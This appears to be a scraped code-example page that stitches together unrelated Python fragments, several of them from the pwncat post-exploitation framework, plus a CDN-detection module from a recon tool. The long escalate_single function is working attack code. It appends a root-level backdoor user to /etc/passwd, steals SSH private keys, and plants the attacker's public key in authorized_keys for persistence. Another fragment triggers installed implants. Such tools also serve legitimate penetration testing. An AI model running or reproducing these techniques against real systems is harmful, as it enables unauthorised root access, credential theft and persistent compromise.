            if (protocol is None and password is None and port is None
                    and args.identity is None):
                db = manager.db.open()
                implants = []

                # Locate all installed implants
                for target in db.root.targets:

                    if target.guid != host and target.public_address[0] != host:
                        continue

                    # Collect users
                    users = {}
                    for fact in target.facts:
                        if "user" in fact.types:
                            users[fact.id] = fact

                    # Collect implants
                    for fact in target.facts:
                        if "implant.remote" in fact.types:
                            implants.append((target, users[fact.uid], fact))

                with Progress(
                        "triggering implant",
                        "•",
                        "{task.fields[status]}",
                        transient=True,
                        console=console,
                ) as progress:
                    task = progress.add_task("", status="...")
                    for target, implant_user, implant in implants:
                        # Check correct user
                        if user is not None and implant_user.name != user:
                            continue
                        # Check correct platform
                        if (args.platform is not None
                                and target.platform != args.platform):
                            continue

                        progress.update(
                            task,
                            status=f"trying [cyan]{implant.source}[/cyan]")

                        # Attempt to trigger a new session
                        try:
                            session = implant.trigger(manager, target)
                            manager.target = session
                            used_implant = implant
                            break
                        except ModuleFailed:
                            db.transaction_manager.commit()
                            continue

            if manager.target is not None:
                manager.target.log(
                    f"connected via {used_implant.title(manager.target)}")
            else:
                try:
                    manager.create_session(
                        platform=args.platform,
                        protocol=protocol,
                        user=user,
                        password=password,
                        host=host,
                        port=port,
                        identity=args.identity,
                    )
                except (ChannelError, PlatformError) as exc:
                    manager.log(f"connection failed: {exc}")

        manager.interactive()

        if manager.sessions:
            with Progress(
                    SpinnerColumn(),
                    "closing sessions",
                    "•",
                    "{task.fields[status]}",
                    console=console,
                    transient=True,
            ) as progress:
                task = progress.add_task("task", status="...")

                # Retrieve the existing session IDs list
                session_ids = list(manager.sessions.keys())

                # Close each session based on its ``session_id``
                for session_id in session_ids:
                    progress.update(task,
                                    status=str(
                                        manager.sessions[session_id].platform))
                    manager.sessions[session_id].close()

                progress.update(task, status="done!", completed=100)
Esempio n. 29
0
import dns.resolver
from urllib.parse import urlparse
import time
from concurrent.futures import ThreadPoolExecutor
from lib.common.utils import load_json
# 进度条设置
from rich.progress import (
    BarColumn,
    TimeRemainingColumn,
    Progress,
)

progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(),
    "[progress.percentage]{task.percentage:>3.0f}%",
    TimeRemainingColumn(),
    "[bold red]{task.completed}/{task.total}",
    transient=True,  # 100%后隐藏进度条
)

data_dir = setting.data_storage_dir

# from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))

# from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))

Esempio n. 30
0
    def escalate_single(
        self,
        techniques: List["Technique"],
        shlvl: str,
        progress: Progress,
        task,
    ) -> Tuple[Optional["Technique"], str]:
        """ Use the given list of techniques to escalate to the user. All techniques
        should be for the same user. This method will attempt a variety of privesc
        methods. Primarily, it will directly execute any techniques which provide
        the SHELL capability first. Afterwards, it will try to backdoor /etc/passwd
        if the target user is root. Lastly, it will try to escalate using a local
        SSH server combined with READ/WRITE capabilities to gain a local shell.

        This is, by far, the most disgusting function in all of `pwncat`. I'd like
        to clean it up, but I'm not sure how to break this up. It's all one continuous
        line of logic. It's meant to implement all possible privilege escalation methods
        for one user given a list of techniques for that user. The largest chunk of this
        is the SSH part, which needs to check that SSH exists, then try various methods
        to either leak or write private keys for the given user.
        """

        readers: List[Technique] = []
        writers: List[Technique] = []

        for technique in techniques:
            if Capability.SHELL in technique.capabilities:
                try:
                    progress.update(task, step=f"attempting {technique}")

                    # Attempt our basic, known technique
                    exit_script = technique.method.execute(technique)
                    pwncat.victim.flush_output(some=True)

                    # Reset the terminal to ensure we are stable
                    time.sleep(
                        0.1)  # This seems inevitable for some privescs...
                    pwncat.victim.reset(hard=False)

                    # Check that we actually succeeded
                    current = pwncat.victim.update_user()

                    if current == technique.user or (
                            technique.user
                            == pwncat.victim.config["backdoor_user"]
                            and current == "root"):
                        progress.update(task, step=f"{technique} succeeded!")
                        pwncat.victim.flush_output()
                        return technique, exit_script

                    # Check if we ended up in a sub-shell without escalating
                    if pwncat.victim.getenv("SHLVL") != shlvl:

                        # Get out of this subshell. We don't need it
                        # pwncat.victim.process(exit_script, delim=False)

                        pwncat.victim.run(exit_script, wait=False)
                        time.sleep(
                            0.1)  # Still inevitable for some privescs...
                        pwncat.victim.recvuntil("\n")

                        # Clean up whatever mess was left over
                        pwncat.victim.flush_output()

                        pwncat.victim.reset(hard=False)

                        shlvl = pwncat.victim.getenv("SHLVL")

                    # The privesc didn't work, but didn't throw an exception.
                    # Continue on as if it hadn't worked.
                except PrivescError:
                    pass
                except ValueError:
                    raise PrivescError
            if Capability.READ in technique.capabilities:
                readers.append(technique)
            if Capability.WRITE in technique.capabilities:
                writers.append(technique)

        if writers and writers[0].user == "root":

            # We need su to privesc w/ file write
            su_command = pwncat.victim.which("su", quote=True)
            if su_command is not None:

                # Grab the first writer
                writer = writers[0]

                progress.update(
                    task, step="attempting [cyan]/etc/passwd[/cyan] overwrite")

                # Read /etc/passwd
                with pwncat.victim.open("/etc/passwd", "r") as filp:
                    lines = filp.readlines()

                # Add a new user
                password = crypt.crypt(pwncat.victim.config["backdoor_pass"])
                user = pwncat.victim.config["backdoor_user"]
                lines.append(
                    f"{user}:{password}:0:0::/root:{pwncat.victim.shell}\n")

                # Join the data back and encode it
                data = ("".join(lines)).encode("utf-8")

                # Write the data
                writer.method.write_file("/etc/passwd", data, writer)

                # Maybe help?
                pwncat.victim.run("echo")

                progress.update(task, step="reloading users")

                # Check that it succeeded
                users = pwncat.victim.reload_users()

                # Check if the new passwd file contained the file
                if user in users:
                    progress.update(
                        task,
                        step=
                        "[cyan]/etc/passwd[/cyan] overwrite [green]succeeded![/green]",
                    )

                    # Log our tamper of this file
                    pwncat.victim.tamper.modified_file("/etc/passwd",
                                                       added_lines=lines[-1:])

                    pwncat.victim.users[user].password = pwncat.victim.config[
                        "backdoor_pass"]
                    self.backdoor_user = pwncat.victim.users[user]

                    # Switch to the new user
                    # pwncat.victim.process(f"su {user}", delim=False)
                    pwncat.victim.process(f"su {user}", delim=True)
                    pwncat.victim.recvuntil(": ")

                    pwncat.victim.client.send(
                        pwncat.victim.config["backdoor_pass"].encode("utf-8") +
                        b"\n")

                    pwncat.victim.flush_output()

                    return writer, "exit"
                else:
                    progress.update(
                        task,
                        step=
                        "[cyan]/etc/passwd[/cyan] overwrite [red]failed[/red]",
                    )

        sshd_running = False
        for fact in pwncat.victim.enumerate.iter("system.service"):
            progress.update(task, step="enumerating remote services")
            if "sshd" in fact.data.name and fact.data.state == "running":
                sshd_running = True

        if sshd_running:
            sshd_listening = True
            sshd_address = "127.0.0.1"
        else:
            sshd_listening = False
            sshd_address = None

        used_technique = None

        if sshd_running and sshd_listening:
            # We have an SSHD and we have a file read and a file write
            # technique. We can attempt to leverage this to use SSH to ourselves
            # and gain access as this user.
            progress.update(
                task,
                step=
                f"[red]sshd[/red] is listening at [cyan]{sshd_address}:22[/cyan]",
            )

            authkeys_path = ".ssh/authorized_keys"

            try:
                with pwncat.victim.open("/etc/ssh/sshd_config", "r") as filp:
                    for line in filp:
                        if line.startswith("AuthorizedKeysFile"):
                            authkeys_path = line.strip().split()[-1]
            except PermissionError:
                # We couldn't read the file. Assume they are located in the default home directory location
                authkeys_path = ".ssh/authorized_keys"

            # AuthorizedKeysFile is normally relative to the home directory
            if not authkeys_path.startswith("/"):
                # Grab the user information from /etc/passwd
                home = pwncat.victim.users[techniques[0].user].homedir

                if home == "" or home is None:
                    raise PrivescError(
                        "no user home directory, can't add ssh keys")

                authkeys_path = os.path.join(home, authkeys_path)

            progress.update(
                task, step=f"authorized keys at [cyan]{authkeys_path}[/cyan]")

            authkeys = []
            privkey_path = None
            privkey = None
            if readers:
                reader = readers[0]
                with reader.method.read_file(authkeys_path, reader) as filp:
                    authkeys = [line.strip().decode("utf-8") for line in filp]

                # Some payloads will return the stderr of the file reader. Check
                # that the authorized_keys even existed
                if len(authkeys) == 1 and "no such file" in authkeys[0].lower(
                ):
                    authkeys = []

                # We need to read each of the users keys in the ".ssh" directory
                # to see if they contain a public key that is already allowed on
                # this machine. If so, we can read the private key and
                # authenticate without a password and without clobbering their
                # keys.
                ssh_key_glob = os.path.join(
                    pwncat.victim.users[reader.user].homedir, ".ssh", "*.pub")
                # keys = pwncat.victim.run(f"ls {ssh_key_glob}").strip().decode("utf-8")
                keys = ["id_rsa.pub"]
                keys = [
                    os.path.join(pwncat.victim.users[reader.user].homedir,
                                 ".ssh", key) for key in keys
                ]

                # Iterate over each public key found in the home directory
                for pubkey_path in keys:
                    if pubkey_path == "":
                        continue
                    progress.update(
                        task,
                        step=
                        f"checking [cyan]{pubkey_path}[/cyan] against authorized_keys",
                    )
                    # Read the public key
                    with reader.method.read_file(pubkey_path, reader) as filp:
                        pubkey = filp.read().strip().decode("utf-8")
                    # Check if it matches
                    if pubkey in authkeys:
                        progress.update(
                            task,
                            step=
                            (f"[green]{os.path.basename(pubkey_path)}[/green] "
                             f"is an authorized key"),
                        )
                        # remove the ".pub" to find the private key
                        privkey_path = pubkey_path.replace(".pub", "")
                        # Make sure the private key exists
                        if (b"no such file" in pwncat.victim.run(
                                f"file {privkey_path}").lower()):
                            progress.update(
                                task,
                                step=
                                (f"[cyan]{os.path.basename(pubkey_path)}[/cyan] "
                                 "has no private key"),
                            )
                            continue

                        progress.update(task, step=f"downloading private key")
                        with reader.method.read_file(privkey_path,
                                                     reader) as filp:
                            privkey = filp.read().strip().decode("utf-8")

                        # The terminal adds \r most of the time. This is a text
                        # file so this is safe.
                        privkey = privkey.replace("\r\n", "\n")

                        # Ensure we remember that we found this user's private key!
                        pwncat.victim.enumerate.add_fact(
                            "private_key",
                            PrivateKeyFact(
                                pwncat.victim.users[reader.user].id,
                                privkey_path,
                                privkey,
                                encrypted=False,
                            ),
                            "pwncat.privesc.Finder",
                        )

                        used_technique = reader

                        break
                else:
                    privkey_path = None
                    privkey = None
            elif writers:
                # TODO this needs to be updated to work in the middle of a rich progress
                console.log(
                    f"[yellow]warning[/yellow]: no readers found for [green]{techniques[0].user}[/green] "
                    f"however, we do have a writer.")
                response = console.input(
                    "Would you like to clobber their authorized keys? (y/N) "
                ).lower()
                if response != "y":
                    raise PrivescError("user aborted key clobbering")

            # If we don't already know a private key, then we need a writer
            if privkey_path is None and not writers:
                raise PrivescError("no writers available to add private keys")

            # Everything looks good so far. We are adding a new private key. so we
            # need to read in the private key and public key, then add the public
            # key to the user's authorized_keys. The next step will upload the
            # private key in any case.
            if privkey_path is None:

                writer = writers[0]

                # Write our private key to a random location
                with open(pwncat.victim.config["privkey"], "r") as src:
                    privkey = src.read()

                with open(pwncat.victim.config["privkey"] + ".pub",
                          "r") as src:
                    pubkey = src.read().strip()

                # Add our public key to the authkeys
                authkeys.append(pubkey)

                progress.update(
                    task, step="adding our public key to authorized keys")

                # Write the file
                writer.method.write_file(authkeys_path, ("\n".join(authkeys) +
                                                         "\n").encode("utf-8"),
                                         writer)

                if not readers:
                    # We couldn't read their authkeys, but log that we clobbered it.
                    # The user asked us to. At least create an un-removable tamper
                    # noting that we clobbered this file.
                    pwncat.victim.tamper.modified_file(authkeys_path)

                # We now have a persistence method for this user no matter where
                # we are coming from. We need to track this.
                pwncat.victim.persist.register("authorized_keys", writer.user)

                used_technique = writer

            # SSH private keys are annoying and **NEED** a newline
            privkey = privkey.strip() + "\n"

            progress.update(task, step="writing private key to temp file")

            with pwncat.victim.tempfile("w", length=len(privkey)) as dst:
                # Write the file with a nice progress bar
                dst.write(privkey)
                # Save the path to the private key. We don't need the original path,
                # if there was one, because the current user can't access the old
                # one directly.
                privkey_path = dst.name

            # Log that we created a file
            pwncat.victim.tamper.created_file(privkey_path)

            # Ensure the permissions are right so ssh doesn't freak out
            pwncat.victim.run(f"chmod 600 {privkey_path}")

            # Run ssh as the given user with our new private key
            progress.update(
                task,
                step=
                f"attempting local [red]ssh[/red] as [green]{techniques[0].user}[/green]",
            )
            ssh = pwncat.victim.which("ssh")

            # First, run a test to make sure we authenticate
            command = (
                f"{ssh} -i {privkey_path} -o StrictHostKeyChecking=no -o PasswordAuthentication=no "
                f"{techniques[0].user}@127.0.0.1")
            output = pwncat.victim.run(f"{command} echo good")

            # Check if we succeeded
            if b"good" not in output:
                raise PrivescError("ssh private key failed")

            # Great! Call SSH again!
            pwncat.victim.process(command)

            # Pretty sure this worked!
            return used_technique, "exit"

        raise PrivescError(f"unable to achieve shell as {techniques[0].user}")